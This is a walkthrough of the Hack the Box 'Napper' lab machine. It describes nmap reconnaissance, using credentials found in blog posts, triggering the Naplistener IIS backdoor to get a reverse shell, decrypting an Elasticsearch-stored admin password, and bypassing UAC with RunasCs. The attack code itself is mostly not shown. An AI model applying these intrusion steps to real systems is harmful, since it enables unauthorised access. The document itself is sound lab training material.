In this post, I would like to share a walkthrough of the Napper Machine from Hack the Box

This room will be considered a Hard machine on Hack the Box

What will you gain from the Napper machine?

For the user flag, you will need to initiate the process by locating a username and password mentioned in a blog post, and leveraging this information to gain entry to an internal blog platform. This platform discusses a legitimate IIS backdoor known as Naplistener, specifying local execution. Utilizing Napper, I will locate Naplistener and develop a tailored .NET binary. This binary will execute upon interaction with the backdoor, facilitating access to a shell.

As for the root flag, you need to locate a preliminary blog post detailing an in-house solution aimed at replacing LAPS, which stores passwords within a local Elastic Search database. I will develop a Go program tasked with retrieving both the seed and the encrypted blob. Subsequently, I will generate the key from the seed and employ it to decrypt the blob, ultimately revealing the password for an admin-level user. Additionally, I will utilize RunasCs.exe to circumvent UAC and secure a shell with administrator privileges.

Information Gathering on Napper Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start

└──╼ $ nmap -sC -sV -oA initial 
Starting Nmap 7.93 ( ) at 2023-11-13 23:09 EST
Nmap scan report for
Host is up (0.47s latency).
Not shown: 998 filtered tcp ports (no-response)
80/tcp  open  http       Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://app.napper.htb
443/tcp open  ssl/https?
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=app.napper.htb/organizationName=MLopsHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:app.napper.htb
| Not valid before: 2023-06-07T14:58:55
|_Not valid after:  2033-06-04T14:58:55
|_ssl-date: 2023-11-14T04:10:15+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 64.52 seconds
└──╼ $ 

Let’s access the website interface

However, it doesn’t look as organized as a proper website page

When trying to access the subdomain of app.napper.htb, it looks much better interface

I did notice that the website is been powered by Hugo

Therefore, let’s enumerate the directory on the website but mostly all the output has been directed to app.napper.htb

As a result, let’s enumerate the vhost by using the gobuster but nothing appears on the output

I did notice that port 443 is open so let’s enumerate the subdomain with the HTTPS wildcard

Let’s access the subdomain of internal.napper.htb but it requests a credential to be input

There should be some credentials on the app.napper.htb website interface. Let’s explore the website to find any useful information

Nothing looks interesting on this post.

I noticed some posts on the last page containing PowerShell commands that provide potential credentials.

As a result, let’s enter the credentials that we found earlier.

At last, we have successfully accessed the internal.napper.htb website interface

Naplistener vulnerability

While we analyze the post shown above, I notice there are some web requests which we can investigate further.

Let’s access the page and try to inspect the packet via BurpSuite

Let’s change the request from GET to POST add the sdafwe3ree23= and see the response of the packet. It responds with Found which shows the website is a valid connection

We should compile the cs file into the exe file format

Once we have successfully compiled the file, let’s encode it with the base64 command

We can copy-paste the base64 command and we also need to URL decode which it should trigger the reverse shell connection

The file should be transferred to the Python server

Boom! Finally, we have retrieved the reverse shell connection back to us.

We can read the user flag by typing the “type user.txt” command

Escalate to Root Privileges Access

Let’s explore more on the file stored within the C:\TEMP\www\Internal\content\posts directory

There is an Elastic URI which uses port 9200

Other information can be found inside the file which provides some details on Elastic

We can execute the Port Forwarding on our attacker’s machine

As a result, let’s start our chisel client on the victim’s machine

I managed to find the elasticsearch-8.8.0 within the Program Files

From the information above, I notice there’s an extension of seed and user-00001

Let’s access the localhost that uses port 9200 on the browser

I managed to find some information on the elastic page that is shown in the screenshot above

The screenshot above shows how to decrypt the data stored in the ES to retrieve the most recent password of the backup user.

Let’s upload the. RunasCs.exe file into the victim’s machine

We will be using the RunasCs.exe command which will trigger the listener to our machine

After a while, the reverse shell connection back to us

We can read the root flag by typing the “type root.txt” command